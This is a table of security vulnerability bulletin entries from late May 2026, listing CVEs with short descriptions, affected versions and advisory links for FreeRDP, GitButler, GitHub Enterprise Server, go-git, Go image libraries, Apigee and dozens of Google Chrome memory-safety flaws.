| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, FreeRDP's planar bitmap decoder has an out-of-bounds heap write when decoding RLE planar data. In libfreerdp/codec/planar.c, freerdp_bitmap_decompress_planar() validates the X destination coordinate nXDst against the caller-provided destination stride (nDstStep) even when it is writing into the internal temp buffer pTempData. An attacker can bypass the check with a large nDstStep and a large nXDst, causing planar_decompress_plane_rle() to write past the end of pTempData. This vulnerability is fixed in 3.26.0. | 2026-05-29 | not yet calculated | CVE-2026-45700 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-mpxh-8fq3-x8mh |
| gitbutlerapp--gitbutler | GitButler is a modern Git-based version control interface for AI-powered workflows. Prior to 0.19.7, a remote code execution vulnerability exists in the Tauri-based GitButler desktop application. An attacker can inject a malicious link in a pull request body, which if clicked by the user allows for arbitrary script execution in the Tauri webview. Users that have not enabled forge integration are not at risk. This vulnerability is fixed in 0.19.7. | 2026-05-28 | not yet calculated | CVE-2026-45261 | https://github.com/gitbutlerapp/gitbutler/security/advisories/GHSA-xpmj-536r-9fc6 |
| GitHub--Enterprise Server | A Server-Side Request Forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed an attacker to cause the server to issue HTTP requests to internal services via the security advisories package lookup feature. By directing requests to an internal management service and measuring response timing, an attacker could infer the values of sensitive environment variables, including signing secrets and private keys. Exploitation required GitHub Packages to be enabled; on instances not running in private mode the vulnerability was exploitable without authentication, otherwise any authenticated user could exploit it. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21.1 and was fixed in versions 3.20.3, 3.19.7, 3.18.10, 3.17.16, and 3.16.19. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-26 | not yet calculated | CVE-2026-8606 | https://docs.github.com/en/enterprise-server@3.21/admin/release-notes#3.21.1 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.3 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.7 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.10 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.16 https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.19 |
| GitHub--Enterprise Server | A server-side request forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to send crafted requests to internal services by exploiting insufficient input validation in an upload endpoint. By injecting path traversal content into request parameters, an attacker could bypass the intended request flow and redirect internal API calls, potentially accessing internal services and exposing sensitive credentials. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.16.20, 3.17.17, 3.18.11, 3.19.8, 3.20.4, and 3.21.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-27 | not yet calculated | CVE-2026-9312 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.20 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.17 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.11 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.8 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.4 https://docs.github.com/en/enterprise-server@3.21/admin/release-notes#3.21.1 |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to 5.19.0 and 6.0.0-alpha.3, go-git may parse malformed Git objects in a way that differs from upstream Git. When commit or tag objects contain ambiguous or malformed headers, go-git's decoded representation may expose values differently from how Git itself would interpret or reject the same object. Additionally, go-git's commit signing and verification logic operates over commit data reconstructed from go-git's parsed representation rather than the original raw object bytes. As a result, go-git may sign or verify a commit payload that is not byte-for-byte equivalent to the object stored in the repository. This can cause a signature to appear valid for a commit whose displayed or effective metadata differs from the object that was intended to be signed. This vulnerability is fixed in 5.19.0 and 6.0.0-alpha.3. | 2026-05-27 | not yet calculated | CVE-2026-45022 | https://github.com/go-git/go-git/security/advisories/GHSA-389r-gv7p-r3rp |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to 5.19.1 and 6.0.0-alpha.4, go-git's SSH transport constructs the remote exec command by wrapping the repository path in single quotes without escaping single quotes embedded inside the path. A repository path containing a single quote can therefore break out of the quoted region in the exec command and be appended as additional shell tokens. This vulnerability is fixed in 5.19.1 and 6.0.0-alpha.4. | 2026-05-27 | not yet calculated | CVE-2026-45570 | https://github.com/go-git/go-git/security/advisories/GHSA-m7cr-m3pv-hgrp |
| golang.org/x/image--golang.org/x/image/bmp | Decoding a paletted BMP file with an out-of-range palette index results in a panic when accessing pixels in the invalid image. | 2026-05-29 | not yet calculated | CVE-2026-42500 | https://go.dev/issue/79576 https://groups.google.com/g/golang-announce/c/uhYX90BlBvI https://go.dev/cl/781500 https://pkg.go.dev/vuln/GO-2026-5031 |
| golang.org/x/image--golang.org/x/image/tiff | The TIFF decoder does not place a limit on the size of PackBits-compressed data. A maliciously-crafted image can exploit this to cause a small image (both in terms of pixel width/height and encoded size) to make the decoder decode large amounts of compressed data. | 2026-05-29 | not yet calculated | CVE-2026-46599 | https://go.dev/issue/79577 https://go.dev/cl/759960 https://groups.google.com/g/golang-announce/c/uhYX90BlBvI https://pkg.go.dev/vuln/GO-2026-5032 |
| Google Cloud--Apigee-X | A vulnerability in the Google Cloud Apigee SetIntegrationRequest policy allowed remote attackers to perform Server-Side Request Forgery (SSRF) and exfiltrate service account access tokens. For successful exploitation, an administrator must initially establish an insecure configuration of the API proxy. | 2026-05-26 | not yet calculated | CVE-2026-2264 | https://docs.cloud.google.com/apigee/docs/security-bulletins/security-bulletins#gcp-2026-034 |
| Google--Chrome | Use after free in Passwords in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10000 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513505608 |
| Google--Chrome | Use after free in PerformanceManager in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10001 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513505927 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10002 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513536416 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10003 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513609324 |
| Google--Chrome | Insufficient validation of untrusted input in Passwords in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10004 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513730012 |
| Google--Chrome | Use after free in WebAppInstalls in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10005 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513750089 |
| Google--Chrome | Race in WebAudio in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10006 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513750691 |
| Google--Chrome | Use after free in SVG in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10007 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513754619 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10008 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513768979 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10009 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513973560 |
| Google--Chrome | Inappropriate implementation in Input in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10010 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513995565 |
| Google--Chrome | Inappropriate implementation in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10011 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514017326 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10012 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514063977 |
| Google--Chrome | Use after free in WebCodecs in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10013 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514715455 |
| Google--Chrome | Use after free in WebMIDI in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10014 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514742327 |
| Google--Chrome | Integer overflow in WTF in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10015 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514746176 |
| Google--Chrome | Use after free in DOM in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10016 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/515155946 |
| Google--Chrome | Out of bounds read in Headless in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10017 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504156069 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10018 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504175501 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10019 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505056913 |
| Google--Chrome | Insufficient validation of untrusted input in Skia in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10020 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496565479 |
| Google--Chrome | Insufficient validation of untrusted input in USB in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10021 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497327715 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 148.0.7778.216 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10022 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513289241 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9872 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505077859 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9873 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/507365348 |
| Google--Chrome | Use after free in Dawn in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9874 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500609038 |
| Google--Chrome | Out of bounds read in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9875 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/507508103 |
| Google--Chrome | Use after free in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9876 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/493747593 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9877 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496445460 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9878 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499054245 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9879 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499129768 |
| Google--Chrome | Insufficient validation of untrusted input in WebGL in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9880 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503615025 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 148.0.7778.216 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9881 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505140741 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9882 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506375217 |
| Google--Chrome | Use after free in Base in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9883 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506477192 |
| Google--Chrome | Use after free in Browser in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9884 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508289938 |
| Google--Chrome | Insufficient validation of untrusted input in UI in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9885 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508452241 |
| Google--Chrome | Use after free in Base in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9886 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508456788 |
| Google--Chrome | Use after free in Proxy in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted PAC script. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9887 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511249104 |
| Google--Chrome | Use after free in WebView in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9888 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511715166 |
| Google--Chrome | Out of bounds read and write in Dawn in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9889 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511727159 |
| Google--Chrome | Use after free in XR in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9890 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513135985 |
| Google--Chrome | Use after free in Extensions in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9891 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513508128 |
| Google--Chrome | Inappropriate implementation in Skia in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9892 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513948178 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9893 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513972075 |
| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9894 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/507707838 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9895 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/491685406 |
| Google--Chrome | Out of bounds write in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9896 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508811474 |
| Google--Chrome | Use after free in DOM in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9897 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496271580 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9898 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496282591 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9899 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497533569 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9900 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497637277 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9901 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497737770 |
| Google--Chrome | Use after free in Accessibility in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9902 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498205735 |
| Google--Chrome | Insufficient validation of untrusted input in Site Isolation in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted MHTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9903 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498783665 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9904 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498804020 |
| Google--Chrome | Use after free in Accessibility in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9905 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498883610 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9906 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499005260 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9907 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499091269 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9908 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499091328 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9909 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499152771 |
| Google--Chrome | Out of bounds memory access in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9910 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499176133 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9911 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499205491 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9912 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499873765 |
| Google--Chrome | Inappropriate implementation in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9913 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500046096 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9914 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500047428 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9915 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500063836 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9916 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500080303 |
